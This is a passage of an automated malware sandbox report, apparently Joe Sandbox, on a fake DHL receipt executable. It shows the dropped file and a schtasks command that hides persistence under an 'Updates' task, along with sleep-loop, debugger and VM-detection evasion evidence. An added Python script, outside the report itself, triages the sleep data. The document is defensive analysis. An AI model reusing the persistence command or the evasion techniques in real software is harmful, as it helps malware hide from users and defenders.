                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, bRfj2rC4pG7ZEhNLJ9.cs High entropy of concatenated method names: 'j3IPlQ80i9', 'TB8PYi8NCp', 'QxvPLApyqU', 'o62PanQlOf', 'n47PJQtipL', 'c6fL8oYFL7', 'wBqL5KSLPt', 'rvTL252noD', 'eCQL6Hm1c5', 'EpyLcNeNhq'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, gl44wT1q87HLXYraSnC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ywdBdguOkj', 'PQ5Bs4IaZm', 'COMB34L44i', 'FsYBBHNEhl', 'sowBwlRVkK', 'R4DBy8lm6F', 'SnABI1vHWw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, zdj3PEYig9NLqPPXiq.cs High entropy of concatenated method names: 'Dispose', 'Ji41csud8d', 'nXqH4dreec', 'C6PoBUMBuk', 'A6d1VrH3I9', 'fOb1z8tZKi', 'ProcessDialogKey', 'b9sH0i9JgE', 'nmAH1g30dq', 'PH6HH3spSl'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, uspSlrVqFn8K2nCUsG.cs High entropy of concatenated method names: 'LiEsRu8vSa', 'e2rsLeU0op', 'L2BsPEJ22o', 'vjgsaFWkFF', 'SHBsdnRknQ', 'KYBsJ0r04x', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, KcKrm2qW9xBIeWQLXF.cs High entropy of concatenated method names: 'hGQ1aIIb5m', 'ms71JCURfU', 'aK91rvE6Gf', 'bvB1DcRMj6', 'zgU1Mt71Rf', 'K2r1G4pG7Z', 'e6BUsOLJkAU4AkRtkN', 'BrLeHQ3oyr4loovmrP', 'giQ1145QW4', 'o511f1xEeF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, z8nNWL11sc77dM38xRF.cs High entropy of concatenated method names: 'j95sVXFk5C', 'mLfsz8H9bF', 'VFf30KA3ts', 'QUs312UR04', 'gWB3H3RYUB', 'p393f3mvfO', 'rFi3qyqKul', 'Jbk3lguYrb', 'YpJ3TMIl8u', 'i5Y3YGc0nP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, fc6Y4SNWFMIQhD6CIG.cs High entropy of concatenated method names: 'gafaxsodbv', 'f9faKJGUn8', 'iDEaekhWpg', 'qgNahhkD5s', 'MADaOdv8v1', 'p4RapSGh8a', 'JnFaUGUBoW', 'nPqaby0oaJ', 'QE6aosIxGc', 'j8KaXbCjCr'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, hMj6LOXuKTkJRKgUt7.cs High entropy of concatenated method names: 'ElELOCOKED', 'aT7LUW9Zp1', 'sVBRnUQ0Bd', 'FrKRif0aBc', 'iHOR7L8QZU', 'AQFRjHhUKo', 'fb7RSjd1s5', 'jkJRFIuSsa', 'z5kRNm7cDj', 'whnR9kPnR7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, K1ZpIWW5G9VChrxXwO.cs High entropy of concatenated method names: 'sd1M9ZycJJ', 'TLhMAtRwZf', 'Q7yMWV05cF', 'h8CMtMKCy9', 'E1kM4DSg2W', 'xDPMnuxVOU', 'iGjMisGjC9', 'WjrM7Pf6Jx', 'j8BMjYmMgs', 'GdnMSAmwVG'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, MFejuDHgOnDPHwdXdP.cs High entropy of concatenated method names: 'p8IelUJMc', 'bjrhQBnVa', 'q9mpccdRa', 'I6VULHnU6', 'uddopnRqB', 'yLjX1uQ9Y', 'ygECXPuhBuV91S83g7', 'RQqCuT1EgYyIe0XE9M', 'BcfvIRGvk', 'UOhsOjLNY'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, pQrWXt5IqWQySIbpSx.cs High entropy of concatenated method names: 'AHfm6l08YJ', 'kaAmVIgmcU', 'YVhv0mGEVe', 'dNgv1vBhFF', 'CevmQonXoa', 'wFWmAMATg9', 'VWqmglk3Ow', 'PuZmWRjH3C', 'T15mtEDtOV', 'KxsmZ11CO2'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.cs High entropy of concatenated method names: 'FCYYWD8v5Z', 'tx1YtKeWvv', 'mbsYZJ37sB', 'uHUYkKEKXu', 'lBpY8j7XxJ', 'H66Y5A5aT7', 'DIYY2pM0Oi', 'JYMY6hIQue', 'KM2YcFikmD', 'P7mYVNTmCe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, HwPeY9jqZdqHXJllxe.cs High entropy of concatenated method names: 'u0IPZvc9b8', 'a1TPkac3an', 'HTZP8TFyQy', 'ToString', 'BnpP50Pd75', 'MHIP2Gkkx6', 'oXISovDfrdXiiTVG4S4', 'wcKthMDj7XOYgKce8mn', 'uyQRDODoKpMgVKfW9JZ'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, nGvw7VzhFHODOIwNM1.cs High entropy of concatenated method names: 'CddspwjxBw', 'Cnlsb63OPT', 'd05soQb1Wo', 'mGYsCkCXkv', 'qVxs4DNu9t', 'CoPsiI0ubO', 'dYbs7JIR4o', 'G7ksI0wccZ', 'nImsx6A06m', 'AGasKUYrZ5'
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe File created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe

                Boot Survival

                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (identical entry repeated 176 times)
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe; Process information set: NOOPENFILEERRORBOX (identical entry repeated 42 times)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (identical entry repeated 5 times)

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 3220, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: AYBPplggzXaXav.exe PID: 7396, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: 2D10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: 2D50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: 4D50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: 8E60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: 9E60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: A060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Memory allocated: B060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: 2B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: 2920000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: 8610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: 9610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: 9800000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Memory allocated: A800000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0173096E rdtsc
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3466
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Window / User API: threadDelayed 9806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.2 %
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 4364 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe TID: 7528 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032 | Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032 | Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032 | Thread sleep count: 9806 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032 | Thread sleep time: -19612000s >= -30000s
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060 | Thread sleep time: -70000s >= -30000s
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060 | Thread sleep time: -45000s >= -30000s
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060 | Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060 | Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe | Thread delayed: delay time: 922337203685477
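The sleep evidence above mixes two different things, and a triage script can separate them. The figure 922337203685477 is exactly 2^63 / 10000, i.e. the relative timeout 0x8000000000000000 (100 ns units) that Sleep(INFINITE) hands to NtDelayExecution, expressed in milliseconds; the "s" suffix the report prints is therefore best read as milliseconds (EhStorAuthn.exe TID 8032 shows 336000 for 168 sleeps and 19612000 for 9806 sleeps, i.e. a constant 2000 per call). Both points are this editor's interpretation, not statements made by the report. Read that way, the hits in powershell.exe, the dropper and AYBPplggzXaXav.exe are threads parked forever (the 1844674407370954 value being two such waits), which .NET hosts do routinely, while the EhStorAuthn.exe thread is a genuine evasive loop of roughly 9800 two-second sleeps. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code; its input is the evidence lines copied from above, and its thresholds are the ones the report itself prints.

```python
"""Triage of the 'Thread sleep' evidence lines from a Joe Sandbox report.

Added example; not part of the report and not Joe Sandbox code. It reads
evidence lines in the report's own text format and separates blocked threads
(infinite waits) from real sleep loops. Statements marked ASSUMPTION are this
example's interpretation, not facts stated by the report.
"""
import re
from collections import defaultdict

# ASSUMPTION: the value the report prints (with an "s" suffix) is milliseconds,
# i.e. the NtDelayExecution relative timeout in 100 ns units divided by 10_000.
# Sleep(INFINITE) is passed down as 0x8000000000000000 ticks, which is
# 2**63 // 10_000 = 922337203685477 ms, exactly the figure in the report.
INFINITE_MS = 2**63 // 10_000
SLEEP_THRESHOLD_MS = 30_000          # the "-30000" bound shown in the report
LOOP_THRESHOLD = 30                  # the "> 30" bound shown in the report

# Accepts both the run-together form ("TID: 8032Thread sleep ...") and a
# "|"-separated rendering of the same line.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>[^|]+?\.exe)\s*\|?\s*TID:\s*(?P<tid>\d+)\s*\|?\s*"
    r"Thread sleep (?P<kind>time|count):\s*-?(?P<value>\d+)"
)

# Constructed sample: lines copied from the report above.
SAMPLE_EVIDENCE = r"""
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 4364Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep count: 9806 > 30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep time: -19612000s >= -30000s
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep time: -70000s >= -30000s
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep time: -32000s >= -30000s
"""


def parse_sleep_evidence(lines):
    """Return {(process, tid): {"time_ms": int, "count": int}}.

    The report prints several snapshots for one thread (168 then 9806 sleeps),
    so the largest value seen per field is kept.
    """
    threads = defaultdict(lambda: {"time_ms": 0, "count": 0})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["proc"].strip(), int(m["tid"]))
        field = "time_ms" if m["kind"] == "time" else "count"
        threads[key][field] = max(threads[key][field], int(m["value"]))
    return dict(threads)


def per_sleep_ms(entry):
    """Average length of one sleep call, or None when no count was reported."""
    return entry["time_ms"] // entry["count"] if entry["count"] else None


def classify(entry):
    t, n = entry["time_ms"], entry["count"]
    if t and t % INFINITE_MS == 0:
        # One or more Sleep(INFINITE) calls: a thread parked forever, which
        # .NET hosts do routinely; it is not a timed delay.
        return "infinite wait"
    if n > LOOP_THRESHOLD and t >= SLEEP_THRESHOLD_MS:
        return "evasive sleep loop"
    if t >= SLEEP_THRESHOLD_MS:
        return "long sleep"
    return "below threshold"


def summarize(lines):
    """One (process, tid, label, total_ms, count, per_sleep_ms) row per thread."""
    rows = []
    for (proc, tid), entry in sorted(parse_sleep_evidence(lines).items()):
        rows.append((proc, tid, classify(entry), entry["time_ms"], entry["count"], per_sleep_ms(entry)))
    return rows


if __name__ == "__main__":
    for proc, tid, label, total, count, each in summarize(SAMPLE_EVIDENCE.splitlines()):
        print(f"{label:<19} tid={tid:<5} total={total} ms count={count} per_sleep={each} ms  {proc}")
```

The "evasive sleep loop" label needs both a count above the report's ">30" bound and a total above its 30000 ms bound, so a single long wait and a tight loop of short sleeps are kept apart; the per-sleep figure (2000 ms for EhStorAuthn.exe) is what you would look for when deciding whether to patch or fast-forward the delay in a debugger.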
Source: AYBPplggzXaXav.exe, 00000009.00000002.1941366329.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: CLaoxM16clnn.exe, 00000015.00000002.4207853460.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2298881340.000001B7BD1CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0173096E rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004179B3 LdrLoadDll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01788158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01784144 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01784144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01720124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017B0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017201F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017C61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0177019F mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01730185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01794180 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0171C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01776050 mov eax, dword ptr fs:[00000030h]
